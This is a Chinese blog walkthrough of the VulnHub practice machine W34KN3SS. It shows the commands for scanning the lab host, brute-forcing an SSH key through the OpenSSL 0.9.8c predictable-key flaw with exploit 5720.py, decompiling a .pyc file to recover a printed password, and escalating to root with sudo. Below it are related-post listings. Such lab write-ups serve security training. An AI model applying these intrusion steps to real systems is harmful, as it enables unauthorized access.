W34KN3SS

已于 2024-08-07 21:35:34 修改
阅读量257 收藏 4
点赞数 4
分类专栏: vulnhub 文章标签: 网络安全
于 2024-08-07 21:24:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141001490
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

开放22/80/443端口

nmap 192.168.236.164 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.164

二、漏洞探测

在端口扫描时发现一个域名,可能需要绑定域名

修改hosts文件,绑定域名weakness.jth,然后访问该域名,发现 -n30,和upload.php页面的title一样

kali绑定该域名,再次进行目录扫描,发现新东西

在notes.txt中有提示,给出openssl的版本,mykey有一个公钥

在kali上搜索相关漏洞

searchsploit openssl 0.9.8c-1

查看漏洞利用文本内容

三、GetShell

下载上传kali解压,生成一个rsa文件夹

tar -jxvf 5622.tar.bz2

远程下载mykey.pub文件到kali上

wget http://weakness.jth/private/files/mykey.pub

再将5720.py文件下载下来进行爆破

python2 5720.py ./rsa/2048 192.168.236.164 n30 22

其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh

在生成的rsa的2048目录下进行ssh连接

四、提权

在当前目录下有一个code文件

文件类型为python 2.7 byte-compiled

攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译

编译完发现了n30的密码 n30:dMASDNB!!#B!#!#33

靶机:python -m SimpleHTTPServer 9999
攻击机:wget http://192.168.236.164:9999/code
       mv code code.pyc
       uncompyle6 -o code.py code.pyc(此条命令需要进入到uncomply目录中执行,或者将其设为环境变量export PATH=$PATH:/home/kali/.local/bin)

sudo su,输入密码后可成功提权

花椒椒椒
关注
专栏目录
靶机系列--W34KN3SS
Nginxx的博客
12-02 1379
靶机系列
W34KN3SS靶机
weixin_74232792的博客
08-05 657
python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。
Vulnhub靶机 W34KN3SS
菜浪马废的博客
04-29 400
应该没配置域名
W34kn3ss
a666666688的博客
09-18 941
文件是 Python 编译后的字节码文件。文件是由解释器在第一次运行时生成的,并且在下次运行相同的代码时会被加载。文件包含了 Python 字节码指令,这些指令可以被解释器直接执行,而不需要先将源代码转换为机器码。编译后的字节码文件可以被缓存起来,以便下次运行相同的代码时可以直接加载,而不必再次编译。文件可以加快程序的启动速度,因为解释器不需要重新编译源代码,而是直接加载已经编译好的字节码。文件)第一次被解释器执行时,Python 会将源代码编译成字节码(如果存在,解释器会使用。文件来加快代码的执行速度。
vulnhub W34kn3ss: 1
箭雨镜屋
07-31 747
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- 修改hosts文件,并扫描网站目录 ---- 利用OpenSSL 0.9.8c-1可预测伪随机数漏洞爆破ssh私钥 ---- uncompyle6反编译.pyc ---- sudo su提权
红队打靶练习:W34KN3SS: 1
分享
01-20 488
红队打靶练习:W34KN3SS: 1。emm,都是见过的openssl密码碰撞+python反编译,没啥难的!
W34KN3SS靶机渗透测试
weixin_58786230的博客
08-11 406
【代码】W34KN3SS靶机渗透测试。
W34KN3SS靶场实战【超详细】
weixin_68615160的博客
08-12 468
没什么发现,看看443端口得到的域名 weakness.jth,访问不到,绑定一下hosts。修改 code 名为 code.pyc,使用 uncompyle6 反编译,得到密码。把文件 copy 到网站根目录,开启一个临时 web 服务,下载下来。查看 5622.txt,给出了 url,需要下载。443端口有一个 weakness.jth 域名。发现一个user.txt和可执行文件code。兔子尾巴有一个值,可能作为账号或密码使用。进入对应目录,公钥连接ssh,连接成功。直接sudo su提权试试。
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3205
每台都做一做,然后记录在博客里.供自己和大家一起学习.
vulhub 学习下载
战神/calmness的博客
12-24 838
New Boxes (March 2020): DC 9: https://www.vulnhub.com/entry/dc-9,412/ Digitalworld.local (Bravery): https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Digitalworld.local (Development): https://www.vulnhub.com/entry/digitalworldlocal-develop
c#二进制文件数据转换base64字符串文本代码
热门推荐
dcryefx44317的博客
11-24 4万+
using System; using System.Text; namespace ConsoleTest { internal class Program { private static void Main(string[] args) { string aaa = ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8504
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
毕业设计论文SpringBoot+Vue毕业生信息招聘平台.docx
10-16
毕业设计论文
PHP-006教务选课学生选课成绩管理系统毕业课程源码设计+论文资料
10-16
编号:306 作为php高校院务学生选课成绩管理系统,在系统中有学生信息和教师信息以及课程信息需要管理员分类管理。 (1)学生管理:管理员登录系统后可以添加学生,查询学生,修改学生,删除学生信息。 (2)教师管理:管理员登录系统后可以添加教师,查询教师,修改教师,删除教师信息。 (3)课程管理:管理员登录系统后可以登记新的课程信息,查询修改课程信息,删除课程信息. (4)授课信息管理:管理员登录系统后可以分配课程由哪个老师教授。 (5)班级信息管理:管理员可以在系统其他功能运行前先把班级信息设置好。 (6)选课管理:学生登录系统后可以对课程进行选择。 (7)成绩管理:教师登录系统后,可以查询自己教授的课程并对学生的成绩打分。 (8)系统管理: 修改登录密码,关于系统说明
在线教育视频&JAVA&基于SpringBoot的在线视频教育平台的设计与实现(毕业论文+开题)
10-16
本系统采用的数据库是Mysql,使用SpringBoot框架开发, 使用在线视频教育平台分为管理员和用户、教师三个角色的权限模块。 管理员所能使用的功能主要有:首页、个人中心、用户管理、教师管理、课程信息管理、课程类型管理、我的收藏管理、系统管理、订单管理等。 用户可以实现首页、个人中心、课程信息管理、我的收藏管理、订单管理等。 教师可以实现首页、个人中心、课程信息管理、我的收藏管理等。
个性化影片推荐系统.zip
最新发布
10-16
随着科学技术的飞速发展,社会的方方面面、各行各业都在努力与现代的先进技术接轨,通过科技手段来提高自身的优势,个性化影片推荐系统当然也不能排除在外。 个性化影片推荐系统,在个性化影片推荐系统可以查看首页、热门电影、新闻资讯、我的、跳转到后台、客服等内容
Uniapp发现的Bug,用于重现project_Uniapp Bug.zip
10-16
Uniapp发现的Bug,用于重现project_Uniapp Bug
FRIIS公式计算距离Matlab实现.rar
10-16
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
您好!根据您的要求,可以使用正则表达式提取大写字母后的数字,代码如下: ```R library(tibble) df <- tibble(x = c("12W34", "AB2C46", "B217C", "akTs6df", "21WD4")) df$number <- gsub("^.*[A-Z](\\d+).*", "\\1", df$x) ``` 解释一下代码: 1. 首先,我们使用了 `gsub` 函数,它可以帮助我们在一个字符串中查找和替换文本。 2. 接着,我们使用了正则表达式 `^.*[A-Z](\\d+).*`,这个正则表达式可以匹配一个字符串中大写字母后的数字。 3. 然后,我们使用 `\\1` 表示替换成正则表达式中第一个括号匹配的内容,也就是提取的数字。 4. 最后,我们将提取到的数字存储在一个新的列 `number` 中。 希望这个代码可以帮助到您!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值